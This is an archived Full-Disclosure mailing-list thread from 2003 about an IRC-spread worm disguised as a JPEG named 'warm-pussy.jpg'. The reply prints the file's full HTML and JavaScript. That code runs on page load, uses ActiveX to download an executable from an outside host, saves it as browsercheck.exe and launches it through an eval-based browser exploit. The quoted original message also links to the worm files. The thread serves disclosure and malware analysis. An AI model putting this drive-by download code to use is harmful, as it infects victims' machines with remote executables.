[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <001601c3a954$4c3514c0$320a0a0a@falcon>
From: segfault at nycap.rr.com (segfault)
Subject: new worm - "warm-pussy.jpg".
You idiot. Just because a file is called warm-pussy.jpg, doesn't mean that
the webserver it resides on isn't going to parse it's actual content (which
is probably plaintext). Look again, I'm sure you'll be surprised.
Contents of warm-pussy.jpg:
<html>
<head>
</head>
<body onLoad="doit()">
<p>
<textarea id="code" style="display: none;">
s=new ActiveXObject("ADODB.Stream");
s.Mode=3;
s.Type=1;
s.Open();
x=new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET","http://vnm.musx.net/moep.exe",0);
x.Send();
s.Write(x.responseBody);
s.SaveToFile("C:\\windows\\temp\\browsercheck.exe",2);
</textarea>
<textarea id="code2" style="display: none;">
md="<object id=\"oFile\""+
" classid=\"clsid:11111111-1111-1111-1111-111111111111\""+
" codebase=\"c:/windows/temp/browsercheck.exe\"></object>";
w=createPopup();
w.document.clear();
w.document.write(md);
</textarea>
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/'/g,"\\'");
line = line.replace(/"/g,"\\\"");
line = line.replace(/[/]/g,"%2f");
line = line.replace(/\r\n/,"");
line += ' ';
if (line != '') {
result += line;
}
}
return result;
}
function weiter() {
open(myURL,"_search");
}
function starten(thecode) {
mycode = preparecode(thecode);
myURL = "file:javascript:eval('" + mycode + "')";
open("http:///","_search");
setTimeout("weiter()", 500);
}
function doit() {
starten(document.all.code.value);
setTimeout("doit2()", 600);
}
function doit2() {
starten(document.all.code2.value);
}
</script>
</p>
<p> </p>
<p><br>
</p>
<p></p>
<p> <img src="nice_warm_pussy.jpg" width="640" height="480"><br>
</p>
<p><br>
</p>
</body>
</html>
----- Original Message -----
From: "Tom Russell" <kalleth@...dram.co.uk>
To: <full-disclosure@...ts.netsys.com>
Sent: Wednesday, November 12, 2003 1:34 PM
Subject: [Full-Disclosure] new worm - "warm-pussy.jpg".
> Manifests itself in an infected victim by saying over IRC (mIRC it seems):
>
> 1824.11| [inx-dj|eJ-Kevin] rofl wie geil, gibt euch das :)) http://
> vnm.musx.net /warm-pussy.jpg <--- einfach geil !
>
> (spaces added to guard against accidental infection)
> It is unknown at this time wether this is another variant of
irc.trojan.fgt.
> The files used in this worm can be obtained at
> http://kalleth.2tone-dev.com/fd/warm-pussy.rar in unaltered form - be
> careful what you do with them.
>
> (i take no responsibility for accidental infection.)
>
> Regards,
> Tom Russell,
> 2tone:development (www.2tone-dev.com)
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
Powered by blists - more mailing lists